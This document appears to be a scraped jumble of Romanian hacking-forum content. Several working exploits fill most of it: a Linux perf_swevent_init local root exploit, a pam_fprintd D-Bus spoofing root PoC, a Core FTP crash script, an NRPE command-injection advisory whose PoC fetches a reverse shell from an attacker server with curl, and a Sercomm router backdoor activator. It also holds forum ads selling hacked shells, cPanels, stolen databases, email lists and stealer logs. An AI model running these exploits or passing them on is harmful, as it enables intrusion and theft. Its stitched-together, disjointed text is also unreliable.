/**
 * Ubuntu 12.04 3.x x86_64 perf_swevent_init Local root exploit
 * by Vitaly Nikolenko (vnik5287@gmail.com)
 *
 * based on semtex.c by sd
 *
 * Supported targets:
 * [0] Ubuntu 12.04.0 - 3.2.0-23-generic
 * [1] Ubuntu 12.04.1 - 3.2.0-29-generic
 * [2] Ubuntu 12.04.2 - 3.5.0-23-generic
 *
 * $ gcc vnik.c -O2 -o vnik
 *
 * $ uname -r
 * 3.2.0-23-generic
 *
 * $ ./vnik 0
 */

/*
 * Review notes (a defender's reading of this PoC):
 *  - Everything below is tied to the three Ubuntu kernel builds listed
 *    above: targets[] hard-codes, per build, the addresses of
 *    perf_swevent_enabled, commit_creds and prepare_kernel_cred, so on any
 *    other kernel the address search fails and the program aborts.
 *  - Host-observable sequence: a 256 MiB fixed-address anonymous mapping
 *    at BASE, a `sidt` from ring 3, a second fixed RWX mapping derived from
 *    the IDT base, one perf_event_open() (raw syscall 298 on x86_64) whose
 *    config word is a large negative index, a software interrupt
 *    (int 3/4/0x80), then setuid(0) and exec of /bin/bash.  An unprivileged
 *    perf_event_open() with an out-of-range config value is the cheapest
 *    single event to alert on.
 *  - Mitigation is the upstream kernel fix for perf_swevent_init.  Raising
 *    kernel.perf_event_paranoid limits what unprivileged callers may request
 *    and may reject this attr (verify on the kernel in question), but it is
 *    not a substitute for patching.
 *  - assert() is load-bearing in this file: mmap, memmem, close and setuid
 *    calls live inside assert(), so a -DNDEBUG build silently drops them.
 */
#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <assert.h>

#define BASE 0x1780000000      /* fixed user-space address of the scratch mapping */
#define SIZE 0x0010000000      /* 256 MiB */
#define KSIZE 0x2000000        /* 32 MiB code mapping */

/* 8-byte marker n (n = 1..3) embedded in payload(); main() later replaces
 * each marker with a real address via memmem(). */
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))

typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred);

/* Per-target kernel symbol addresses; index with argv[1]. */
uint64_t targets[3][3] = {{0xffffffff81ef67e0, // perf_swevent_enabled
                          0xffffffff81091630, // commit_creds
                          0xffffffff810918e0}, // prepare_kernel_cred
                         {0xffffffff81ef67a0, 0xffffffff81091220, 0xffffffff810914d0},
                         {0xffffffff81ef5940, 0xffffffff8107ee30, 0xffffffff8107f0c0}
};

/*
 * Runs in kernel context once the patched IDT entry is taken.  Never call
 * it from user space: the AB(n) constants are placeholders that main()
 * overwrites in the copied code (AB(1) -> the IDT slot being restored,
 * AB(2) -> commit_creds, AB(3) -> prepare_kernel_cred).
 */
void __attribute__((regparm(3))) payload() {
    uint32_t *fixptr = (void*)AB(1);
    // restore the handler
    *fixptr = -1;
    commit_creds_fn commit_creds = (commit_creds_fn)AB(2);
    prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)AB(3);
    commit_creds(prepare_kernel_cred((uint64_t)NULL));
}

/*
 * One perf_event_open() (raw syscall 298 on x86_64).  buf is a hand-built
 * struct perf_event_attr: the first word packs type/size, the second is
 * `config`, which carries the index `off` that the vulnerable
 * perf_swevent_init() (named in the header) consumes; the remaining words
 * are attr flags and are not examined here.  The returned fd is closed
 * immediately — the close is inside assert().
 */
void trigger(uint32_t off) {
    uint64_t buf[10] = { 0x4800000001, off, 0, 0, 0, 0x300 };
    int fd = syscall(298, buf, 0, -1, -1, 0);
    assert( !close(fd) );
}

/*
 * Usage: ./vnik <target index 0..2>.  Returns only if execl() fails;
 * every precondition failure aborts through assert().
 */
int main(int argc, char **argv) {
    uint64_t off64, needle, kbase, *p;
    uint8_t *code;
    uint32_t int_n, j = 5, target = 1337;   /* both overwritten before use */
    int offset = 0;
    void *map;

    assert(argc == 2 && "target?");
    assert( (target = atoi(argv[1])) < 3 );

    /* Destination of `sidt`: 2-byte limit + 8-byte base, packed to match
     * the 64-bit IDTR image. */
    struct { uint16_t limit; uint64_t addr; } __attribute__((packed)) idt;

    // mmap user-space block so we don't page fault
    // on sw_perf_event_destroy
    /* 3 = PROT_READ|PROT_WRITE, 0x32 = MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS,
     * written as raw numbers. */
    assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
    memset(map, 0, SIZE);

    /* Read the IDT register from user mode.  CPUs/kernels with UMIP trap
     * `sidt` from ring 3, and the program dies here. */
    asm volatile("sidt %0" : "=m" (idt));
    kbase = idt.addr & 0xff000000;   /* low 32 bits of the IDT base, rounded down to 16 MiB */
    printf("IDT addr = 0x%lx\n", idt.addr);

    /* Second fixed mapping, RWX (prot 7), filled with NOP (0x90); the
     * payload is copied into its last KiB, preceded by a 13-byte stub. */
    assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
    memset(code, 0x90, KSIZE);
    code += KSIZE-1024;
    memcpy(code, &payload, 1024);
    memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13);

    // can only play with interrupts 3, 4 and 0x80
    /* Search for a negative 32-bit index off32 with
     *   perf_swevent_enabled + off32*24 == &IDT[int_n] + 8
     * so that the kernel's out-of-range access through that index hits the
     * upper half of the chosen IDT entry.  The inner loop walks the whole
     * negative 32-bit range: slow, but bounded. */
    for (int_n = 3; int_n <= 0x80; int_n++) {
        for (off64 = 0x00000000ffffffff; (int)off64 < 0; off64--) {
            int off32 = off64;
            if ((targets[target][0] + ((uint64_t)off32)*24) == (idt.addr + int_n*16 + 8)) {
                offset = off32;
                goto out;
            }
        }
        if (int_n == 4) {
            // shit, let's try 0x80 if the kernel is compiled with
            // CONFIG_IA32_EMULATION
            int_n = 0x80 - 1;
        }
    }
out:
    /* No usable (int_n, offset) pair: unsupported kernel layout. */
    assert(offset);
    printf("Using int = %d with offset = %d\n", int_n, offset);

    /* Patch the three AB(n) markers inside the copied payload:
     * j == 0 -> address of the IDT slot payload() restores,
     * j == 1 -> commit_creds, j == 2 -> prepare_kernel_cred. */
    for (j = 0; j < 3; j++) {
        needle = AB(j+1);
        assert(p = memmem(code, 1024, &needle, 8));
        *p = !j ? (idt.addr + int_n * 16 + 8) : targets[target][j];
    }

    /* Perform the out-of-range perf_event_open, then raise the interrupt
     * whose entry was chosen above. */
    trigger(offset);
    switch (int_n) {
    case 3: asm volatile("int $0x03"); break;
    case 4: asm volatile("int $0x04"); break;
    case 0x80: asm volatile("int $0x80");
    }

    /* If payload() ran, the process now carries root credentials. */
    assert(!setuid(0));
    return execl("/bin/bash", "-sh", NULL);
}
/* darklena. fprintd/pam_fprintd local root PoC. However dbus-glib plays an important role.
 *
 * (C) 2013 Sebastian Krahmer, all rights reversed.
 *
 * pam_fprintd uses net.reactivated.Fprint service to trigger finger swiping and
 * registers DBUS signal inside the PAM authentication function:
 *
 * dbus_g_proxy_add_signal(dev, "VerifyStatus", G_TYPE_STRING, G_TYPE_BOOLEAN, NULL);
 * dbus_g_proxy_add_signal(dev, "VerifyFingerSelected", G_TYPE_STRING, NULL);
 * dbus_g_proxy_connect_signal(dev, "VerifyStatus", G_CALLBACK(verify_result),
 *                             data, NULL);
 *
 * Then, when the DBUS signal arrives, the signal argument is basically just checked
 * to be the "verify-match" string; which however is expected to come from the legit
 * net.reactivated.Fprint service. Since there is no message filter registered in either
 * pam_fprintd, nor inside dbus-glib which it is using, such signals can be spoofed
 * by anyone. In order to do so, we first need to spoof a NameOwnerChanged signal
 * so the dbus_g_proxy_manager_filter() function inside dbus-glib will find our
 * sender-name (which cannot be spoofed) inside its hash tables and match it to
 * net.reactivated.Fprint.
 *
 * To test this PoC, start a service (su is fine) as user that is using pam_fprintd.
 * On a second xterm, when you see 'Swipe your ... finger' message start this PoC
 * and you will notice that a rootshell is spawned in the first xterm w/o giving your finger.
 *
 * Used various DBUS tutorials and example code, while writing this.
 *
 * $ cc darklena.c `pkg-config --cflags dbus-1` -ldbus-1 -Wall
 *
 */

/*
 * Review notes:
 *  - The weakness on the receiving side is a missing sender check: the
 *    pam_fprintd callback acts on any "VerifyStatus" signal carrying
 *    "verify-match".  The fix is to compare dbus_message_get_sender() of
 *    each signal with the bus daemon's GetNameOwner answer for
 *    net.reactivated.Fprint (a unique name, which a client cannot forge)
 *    and drop everything else.  The forged NameOwnerChanged works only
 *    because dbus-glib keeps its own name->proxy map; whether a given
 *    dbus-daemon version refuses to relay client-originated messages on
 *    the org.freedesktop.DBus interface is not established here.
 *  - Observable on the system bus: an unprivileged connection emitting
 *    NameOwnerChanged and VerifyStatus signals to unicast ":1.N"
 *    destinations; `dbus-monitor --system` shows the pair clearly.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <dbus/dbus.h>

/*
 * Report `s` via perror() and exit.
 * NOTE(review): most failures in main() are D-Bus errors, which do not set
 * errno, so exit(errno) may be exit(0) even though the program failed.
 */
void die(const char *s)
{
    perror(s);
    exit(errno);
}

/*
 * argv[1] (optional): unique bus name (":1.N") to use as the Fprint service
 * owner instead of asking the bus daemon.  Returns 0 after the loop; every
 * error path exits through die().
 */
int main(int argc, char **argv)
{
    DBusError err;
    DBusConnection *conn = NULL;
    DBusMessage *vrfy_msg = NULL, *noc_msg = NULL, *nl_msg = NULL, *reply = NULL;
    dbus_uint32_t serial = 0;
    dbus_bool_t t = 1;
    int un = 0, i = 0, reply_to = -1;   /* reply_to == -1: library default timeout */
    const char *vrfy_match = "verify-match", *cname = NULL,
               *name = "net.reactivated.Fprint", *prev_owner = NULL;
    char dest[32];

    /* override unique name of net.reactivated.Fprint */
    if (argc > 1)
        prev_owner = strdup(argv[1]);   /* never freed; the process exits shortly */

    printf("\n[**] darklena, pam_fprintd PoC exploit 2013\n\n");
    printf("[*] Initializing DBUS ...\n");
    dbus_error_init(&err);
    conn = dbus_bus_get(DBUS_BUS_SYSTEM, &err);
    if (dbus_error_is_set(&err)) {
        fprintf(stderr, "Error: %s\n", err.message);
        die("dbus_error_is_set");
    }
    if ((cname = dbus_bus_get_unique_name(conn)) == NULL)
        die("dbus_bus_get_unique_name");

    /* Numeric part of our own unique name ":1.<un>"; the loop below counts
     * down from it.  strchr() is assumed to find the '.' (unique names
     * always contain one). */
    un = atoi(strchr(cname, '.') + 1);
    printf("[+] Done. Found my unique name: %s (%d)\n", cname, un);

    if (!prev_owner) {
        printf("[*] Trying to find unique name of '%s' ...\n", name);
        nl_msg = dbus_message_new_method_call("org.freedesktop.DBus",
                                              "/org/freedesktop/DBus",
                                              "org.freedesktop.DBus",
                                              "GetNameOwner");   /* NULL return not checked */
        if (!dbus_message_append_args(nl_msg, DBUS_TYPE_STRING, &name, DBUS_TYPE_INVALID))
            die("[-] dbus_message_append_args");
        reply = dbus_connection_send_with_reply_and_block(conn, nl_msg, reply_to, &err);
        dbus_message_unref(nl_msg);
        if (dbus_error_is_set(&err)) {
            fprintf (stderr, "[-] Error: %s\n", err.message);
            die("[-] dbus_connection_send_with_reply_and_block");
        }
        /* NOTE(review): for DBUS_TYPE_STRING, dbus_message_get_args() returns
         * a pointer into `reply`'s own storage, so prev_owner dangles once
         * reply is unref'd below; it should be strdup'd first, as is done for
         * argv[1]. */
        if (!dbus_message_get_args(reply, &err, DBUS_TYPE_STRING, &prev_owner, DBUS_TYPE_INVALID)) {
            fprintf(stderr, "[-] Error: %s\n", err.message);
            die("[-] dbus_message_get_args");
        }
        dbus_message_unref(reply);
    }
    printf("[+] Found unique name of '%s' as '%s'\n", name, prev_owner);

    /* Try the 19 unique names just below our own: connections opened
     * earlier (the su session under test) received lower numbers. */
    for (i = 1; i < 20; ++i) {
        /* spoof a NameOwnerChanged signal */
        noc_msg = dbus_message_new_signal("/org/freedesktop/DBus",
                                          "org.freedesktop.DBus",
                                          "NameOwnerChanged");
        /* spoof a VerifyStatus */
        vrfy_msg = dbus_message_new_signal("/net/reactivated/Fprint/Device/0",
                                           "net.reactivated.Fprint.Device",
                                           "VerifyStatus");
        if (!vrfy_msg || !noc_msg)
            die("[-] dbus_message_new_signal");

        /* NameOwnerChanged(name, old_owner, new_owner): claims that this
         * connection (cname) now owns net.reactivated.Fprint. */
        if (!dbus_message_append_args(noc_msg, DBUS_TYPE_STRING, &name,
                                      DBUS_TYPE_STRING, &prev_owner,
                                      DBUS_TYPE_STRING, &cname,
                                      DBUS_TYPE_INVALID))
            die("[-] dbus_message_append_args1");
        /* VerifyStatus("verify-match", TRUE): the argument pair the callback accepts. */
        if (!dbus_message_append_args(vrfy_msg, DBUS_TYPE_STRING, &vrfy_match,
                                      DBUS_TYPE_BOOLEAN, &t,
                                      DBUS_TYPE_INVALID))
            die("[-] dbus_message_append_args2");

        /* iterate over unique names short below under our own
         * to hit the previously started su */
        snprintf(dest, sizeof(dest), ":1.%d", un - i);
        printf("[*] Using new destination: %s\n", dest);
        if (!dbus_message_set_destination(vrfy_msg, dest))
            die("[-] dbus_message_set_destination");
        if (!dbus_message_set_destination(noc_msg, dest))
            die("[-] dbus_message_set_destination");

        /* Order matters: the ownership claim must be processed before the
         * status signal, hence the flush and the 1 ms pause between them. */
        if (!dbus_connection_send(conn, noc_msg, &serial))
            die("[-] dbus_connection_send");
        dbus_connection_flush(conn);
        usleep(1000);
        if (!dbus_connection_send(conn, vrfy_msg, &serial))
            die("[-] dbus_connection_send");
        dbus_connection_flush(conn);

        dbus_message_unref(vrfy_msg);
        dbus_message_unref(noc_msg);
    }

    printf("\n[**] Here comes the pain! (but no one's to too innocent to die)\n");
    return 0;
}
Vand: • Shell-uri - $2 / buc • cPanele - $2 / buc • 14 DB-uri de la diferite site-uri de jocuri online (toate ~ 300 MB) - $80 • Mail-uri: UK (+700k) - $40 / 100k DE (+350k) - $45 / 100k USA (+900k) - $50 / 100k LU (+500k) - $50 / 100k Hotmail (+400k) - $35 / 100k Yahoo (+550k) - $35 / 100k And other (+900k) - $30 / 100k • Loguri (stealer) - pretul in functie de "cantitate" Metoda de plata bitcoin & perfectmoney. Pentru mai multe detalii, PM.
#!/usr/bin/python import socket,sys,time def Usage(): print ("Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C.") print ("Usage: ./coreftp_dos.py <host> <port> <username> <password>") print ("Ex: ./coreftp_dos.py 192.168.10.10 21 ftp ftp\n") if len(sys.argv) <> 5: Usage() sys.exit(1) else: host=sys.argv[1] port=sys.argv[2] user=sys.argv[3] passwd=sys.argv[4] evil = '\x41' * 210 print "[+] Trying to crash Core FTP server with " + str(len(evil)) + " buffer bytes" print "[+] Host: " + host + " Port: " + port + " User: " + user + " Pass: " + passwd print "[+] Attempting to connect to the remote Core FTP Server..." first = socket.socket(socket.AF_INET, socket.SOCK_STREAM) port=int(port) try: connect = first.connect((host, port)) except: print "[-] There was an error while trying to connect to the remote FTP Server" sys.exit(1) print "[+] Connection to remote server successfully... now trying to authenticate" first.recv(1024) first.send('USER ' + user + '\r\n') first.recv(1024) first.send('PASS ' + passwd + '\r\n') first.recv(1024) first.send('dir\r\n'); first.send('TYPE ' + evil + '\r\n') try: first.recv(1024) except: print "[-] Couldn\'t authenticate in the remote FTP server" sys.exit(1) print "[+] First buffer was sent, waiting 30 seconds to send a second time with some more bad data..." first.close() second = socket.socket(socket.AF_INET, socket.SOCK_STREAM) time.sleep(30) try: connect = second.connect((host, port)) except: print "[-] FTP Server isn\'t responding... it might had successfully crashed." sys.exit(1) second.send('USER ' + user + '\r\n') second.recv(1024) second.send('PASS ' + passwd + '\r\n') second.recv(1024) second.send('TYPE ' + evil + '\r\n') second.recv(1024) print "[+] By now, Core FTP Server should had crashed and will not accept new connections." second.close() sys.exit(0) source
Usor, usor se cam duce farmecul forum-ului. Si sa nu se inteleaga gresit, hacking-ul nu se rezuma doar la root-uri. Azi interzicem vanzarea root-urilor, maine paginilor de facebook (care pana la urma de unde stim noi ca nu-s si alea furate?), poimaine nologinele, socks si alte chestii care se gasesc pe la market. Mai bine se implementeaza un sistem "verified seller", cu o suma stabilita de staff, in felul asta scoatem hostu'. Anyway, fiecare partea rea, are si o parte buna.
UP! Ofer 27$ bitcoin pentru 22$ paypal.
UP! $30 bitcoin to paypal?!
Imi vreau cele 5 minute inapoi. Uee!
$15 bitcoin to paypal...careva interesat?
Felicitari baieti! +1 pentru RST Trist ca doar la topicurile de cacat sunt 100 de pagini si 145.656.32543,21 de reply-uri... //Esti sigur ca ai testat pe versiunea vBulletin 5.1?
============================================= - Release date: 17.04.2014 - Discovered by: Dawid Golunski - Severity: High ============================================= I. VULNERABILITY ------------------------- NRPE - Nagios Remote Plugin Executor <= 2.15 Remote Command Execution II. BACKGROUND ------------------------- Nagios is an open source computer system monitoring, network monitoring and infrastructure monitoring software application. Nagios offers monitoring and alerting services for servers, switches, applications, and services. It alerts the users when things go wrong and alerts them a second time when the problem has been resolved. The NRPE (Nagios Remote Plugin Executor) addon is designed to allow you to execute Nagios plugins on remote Linux/Unix machines. The main reason for doing this is to allow Nagios to monitor "local" resources (like CPU load, memory usage, etc.) on remote machines. Since these public resources are not usually exposed to external machines, an agent like NRPE must be installed on the remote Linux/Unix machines. III. INTRODUCTION ------------------------- Nagios Remote Plugin Executor (NRPE) contains a vulnerability that could allow an attacker to remotely inject and execute arbitrary code on the host under NRPE account (typically 'nagios'). The vulnerability is due to NRPE not properly sanitizing user input before passing it to a command shell as a part of a configured command. In order for an attacker to take advantage of the host NRPE must be compiled and configured with command arguments. No authentication is required to exploit this vulnerability if the NRPE port has not been protected with a firewall. IV. DESCRIPTION ------------------------- NRPE expects definitions of commands in nrpe.cfg config file. 
Some of the examples given in the config with hardcoded arguments are: command[check_users]=/usr/local/nagios/libexec/check_users -w 5 -c 10 command[check_load]=/usr/local/nagios/libexec/check_load -w 15,10,5 -c 30,25,20 command[check_hda1]=/usr/local/nagios/libexec/check_disk -w 20% -c 10% -p /dev/hda1 when command arguments are enabled then user is also allowed to define commands with variables like: command[check_users]=/usr/local/nagios/libexec/check_users -w $ARG1$ -c $ARG2$ command[check_disk]=/usr/local/nagios/libexec/check_disk -w $ARG1$ -c $ARG2$ -p $ARG3$ This is often suggested for convenience in various nagios/nrpe setup tutorials on the web. To get a result from a defined command in NRPE daemon the following nrpe client can be used with -a option that passes arguments: # /usr/local/nagios/libexec/check_nrpe -H 10.10.10.5 -c check_users -a 4 4 USERS OK - 4 users currently logged in |users=4;4;4;0 in case check_users command was defined with arguments as shown above NRPE would execute: /usr/local/nagios/libexec/check_users -w 4 -c 4 on the local system. As we can find in the source code of nrpe-2.15/src/nrpe.c NRPE daemon uses popen() function for command execution: /* executes a system command via popen(), but protects against timeouts */ int my_system(char *command,int timeout,int *early_timeout,char *output,int output_length){ ----cut---- /* run the command */ fp=popen(command,"r"); using popen() results in the command being executed with the help of a command shell. Before this function is reached however NRPE takes several measures to prevent malicious command injection to the shell. That includes filtration based on a blacklist: #define NASTY_METACHARS "|`&><'\"\\[]{};" /* make sure request doesn't contain nasties */ if(contains_nasty_metachars(pkt->buffer)==TRUE){ syslog(LOG_ERR,"Error: Request contained illegal metachars!"); that prevents bash special characters like semicolon, pipe etc. 
The code is also making sure that arguments do not contain bash command substitution, e.g. $(ps aux): if(strstr(macro_argv[x],"$(")) { syslog(LOG_ERR,"Error: Request contained a bash command substitution!"); return ERROR; Despite these checks the code is vulnerable to command injection, as the bash shell allows multiple commands to be executed if they are separated by a new line. None of the checks examines the arguments for an occurrence of a new line character: 0x0A V. PROOF OF CONCEPT ------------------------- To execute an arbitrary command an attacker could simply add a new line character after a parameter and follow it with his own command. To run the touch /tmp/vulntest command an attacker could use the check_nrpe client with arguments: # /usr/local/nagios/libexec/check_nrpe -H 10.10.10.5 -c check_users -a "`echo -e "\x0a touch /tmp/vulntest "` #" 4 which makes the NRPE daemon run the following series of commands: /usr/local/nagios/libexec/check_users -w <new_line> touch /tmp/vulntest # -c 4 and a file /tmp/vulntest would be created with the nagios user as the owner. The hash character is there to comment out the rest of the arguments. An attacker gets a limited set of commands as most of the metacharacters are prohibited by the blacklist. So for example it's difficult to create new files in the system without using the > symbol etc. An attacker could however download a snippet of perl/python etc. code from the web by using the wget or curl command and get a reverse shell.
This would allow unrestricted access to the command line: ---------[revshell.pl on attackers-server]--------- #!/usr/bin/perl use Socket; #attackers ip to connect back to $i="10.10.10.40"; $p=8080; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))) { open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i"); } -------------------------------------------------- /usr/local/nagios/libexec/check_nrpe -H 10.10.10.5 -c check_users -a "`echo -e "\x0a curl -o /tmp/tmp_revshell http://attackers-server/revshell.pl \x0a perl /tmp/tmp_revshell # "` 4 " [attacker@10.10.10.40 ]# nc -v -l 8080 Connection from 10.10.10.5 port 8080 [tcp/ddi-tcp-1] accepted sh-4.1$ id uid=501(nagios) gid=501(nagios) groups=501(nagios),502(nagcmd) sh-4.1$ sh-4.1$ cat /etc/passwd | head -n 4 ; pwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin / sh-4.1$ ls -l /tmp/tmp_revshell -rw-rw-r-- 1 nagios nagios 269 Apr 17 05:14 /tmp/tmp_revshell sh-4.1$ rm -f /tmp/tmp_revshell VI. BUSINESS IMPACT ------------------------- An attacker could exploit the vulnerability to gain access to the system in the context of a nagios user this could lead to further compromise of the server. VII. SYSTEMS AFFECTED ------------------------- Current version of NRPE 2.15 and older are vulnerable. VIII. SOLUTION ------------------------- Disable command arguments if possible. Protect access to NRPE port and only allow access from a trusted nagios server. Install updated version of NRPE when it becomes available. IX. REFERENCES ------------------------- http://www.nagios.org http://sourceforge.net/projects/nagios/files/nrpe-2.x/ http://exchange.nagios.org/directory/Addons/Monitoring-Agents/NRPE--2D-Nagios-Remote-Plugin-Executor/details http://legalhackers.com/advisories/nagios-nrpe.txt X. 
CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com legalhackers.com XI. REVISION HISTORY ------------------------- April 17th, 2014: Advisory created XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. source
/***************************************
 * PoC to reactivate Sercomm TCP/32674 backdoor
 * See http://www.synacktiv.com/ressources/TCP32764_backdoor_again.pdf
 * Eloi Vanderbeken - Synacktiv
 *
 * THIS SOFTWARE IS PROVIDED BY SYNACKTIV ''AS IS'' AND ANY
 * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
 * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 * DISCLAIMED. IN NO EVENT SHALL SYNACKTIV BE LIABLE FOR ANY
 * DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
 * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
 * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
 * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
 * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 *
 * PoC based on Wilmer van der Gaast's code
 * http://wiki.openwrt.org/_media/toh/netgear/dg834.g.v4/nftp.c
 ***************************************/

/*
 * Review notes:
 *  - One broadcast Ethernet frame with ethertype 0x8888 and a 16-byte
 *    payload is all this program sends; it then waits for the first 0x8888
 *    frame back and hex-dumps it.  On a monitored LAN any frame with this
 *    ethertype is worth an alert — nothing in normal operation should emit
 *    it (beyond, presumably, the vendor's own tooling).
 *  - The raw AF_PACKET socket needs CAP_NET_RAW; the program opens it as
 *    root and drops to the real uid right away, which is the right order.
 *  - The durable fix for device owners is vendor firmware that removes the
 *    service; the linked paper covers the background.  There is nothing to
 *    configure on the client side of this PoC.
 *  - htole16()/be16toh() are used without including <endian.h>; whether
 *    they resolve depends on what the other headers pull in.
 */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>
#include <linux/if_arp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

/* Ethertype of the device's management protocol (see the paper above). */
#define ETH_P_NFTP 0x8888

/* Values for raw_packet.type; only SCFGMGR_LAUNCH (0x201) is used here. */
enum backdoor_command {
    PING_BACKDOOR = 0x200,
    SCFGMGR_LAUNCH,
    SET_IP
};

/* Minimal Ethernet header.  The global `eth` is declared but never used. */
struct ether_header {
    unsigned char ether_dhost[ETH_ALEN];
    unsigned char ether_shost[ETH_ALEN];
    unsigned short ether_type;
} eth;

/* On-wire layout: 14-byte header, five u16 fields, up to 528 payload bytes.
 * There is no packing attribute; this relies on the compiler inserting no
 * padding, which holds for these field sizes. */
struct raw_packet {
    struct ether_header header;
    uint16_t type;
    uint16_t sequence;
    uint16_t offset;
    uint16_t chunk;
    uint16_t payload_len;
    uint8_t payload[528];
};

/*
 * argv[1]: interface to send on.  Sends one frame, blocks until the first
 * ETH_P_NFTP frame arrives, prints it and returns 0; every failure path
 * exits with status 1.
 */
int main(int argc, char *argv[])
{
    int sockfd, res, i, len;
    char src_mac[ETH_ALEN];
    struct ifreq iface;                  /* not zeroed; only ifr_name is written before the ioctls */
    struct sockaddr_ll socket_address;   /* not zeroed; only the fields set below are initialized */
    struct raw_packet packet;

    memset(&packet, 0, sizeof(packet));

    if (argc < 2) {
        fprintf(stderr, "usage : %s [IFNAME]\n", argv[0]);
        exit(1);
    }

    /* Raw socket that receives every ethertype (filtered in the loop below). */
    sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (sockfd == -1) {
        if(geteuid() != 0) {
            fprintf(stderr, "You should probably run this program as root.\n");
        }
        perror("socket");
        exit(1);
    }
    seteuid(getuid());   /* drop privileges; return value not checked */

    /* NOTE(review): strncpy() leaves ifr_name unterminated when argv[1] is
     * IFNAMSIZ bytes or longer; snprintf(iface.ifr_name, IFNAMSIZ, "%s",
     * argv[1]) is the safe form. */
    strncpy(iface.ifr_name, argv[1], IFNAMSIZ);
    res = ioctl(sockfd, SIOCGIFHWADDR, &iface);
    if(res < 0) {
        perror("ioctl");
        exit(1);
    }
    memcpy(src_mac, iface.ifr_hwaddr.sa_data, ETH_ALEN);
    res = ioctl(sockfd, SIOCGIFINDEX, &iface);
    if(res < 0) {
        perror("ioctl");
        exit(1);
    }

    // set src mac
    memcpy(packet.header.ether_shost, src_mac, ETH_ALEN);
    // broadcast
    memset(packet.header.ether_dhost, 0xFF, ETH_ALEN);
    // MD5("DGN1000")
    memcpy(packet.payload, "\x45\xD1\xBB\x33\x9B\x07\xA6\x61\x8B\x21\x14\xDB\xC0\xD7\x78\x3E", 0x10);
    packet.payload_len = htole16(0x10);
    // ethernet packet type = 0x8888
    packet.header.ether_type = htons(ETH_P_NFTP);
    // launch TCP/32764 backdoor
    packet.type = htole16(SCFGMGR_LAUNCH);

    socket_address.sll_family = PF_PACKET;
    socket_address.sll_protocol = htons(ETH_P_NFTP);
    socket_address.sll_ifindex = iface.ifr_ifindex;
    socket_address.sll_hatype = ARPHRD_ETHER;
    socket_address.sll_pkttype = PACKET_OTHERHOST;
    // broadcast
    socket_address.sll_halen = ETH_ALEN;
    memset(socket_address.sll_addr, 0xFF, ETH_ALEN);

    /* 24 = 14-byte header + five u16 fields; 0x10 is the payload length. */
    res = sendto(sockfd, &packet, 0x10 + 24, 0, (struct sockaddr *)&socket_address, sizeof(socket_address));
    if (res == -1) {
        perror("sendto");
        exit(1);
    }

    /* ETH_P_ALL delivers every frame on the host; discard until one with
     * our ethertype shows up.  No timeout: a device that never answers
     * leaves the program blocked here. */
    do {
        memset(&packet, 0, sizeof(packet));
        res = recvfrom(sockfd, &packet, sizeof(packet), 0, NULL, NULL);
        if (res == -1) {
            perror("recvfrom");
            exit(1);
        }
    } while (ntohs(packet.header.ether_type) != ETH_P_NFTP);

    /* res >= 0 here, so the int-vs-size_t comparison is safe. */
    if (res < sizeof(packet) - sizeof(packet.payload)) {
        fprintf(stderr, "packet is too short: %d bytes\n", res);
        exit(1);
    }

    len = be16toh(packet.payload_len); // SerComm has a real problem with endianness
    printf("received packet: %d bytes (payload len = %d) from ", res, len);
    for (i = 0; i < ETH_ALEN; i++)
        printf("%02X%c", packet.header.ether_shost[i], i == ETH_ALEN-1 ? '\n' : ':');
    /* Bounded by both the announced length and the buffer, so a bogus
     * payload_len cannot read past the struct. */
    for (i = 0; (i < len) && (i < sizeof(packet.payload)); i++) {
        printf("%02X ", packet.payload[i]);
        if ((i+1) % 16 == 0)
            printf("\n");
    }
    printf("\n");
    return 0;
}
Pacat de timpul si banii irositi in vb5, mai bine pastram versiunea asta (ar trebui facut un poll), multa lume e multumita de versiunea actuala... // Cei care nu se pot loga, stergeti iar cookie si cache.
Salut, am un cod Ukash in valoare de 20e si as vrea perfectmoney sau paypal in schimb, cei interesati contactati-ma pe privat.
##
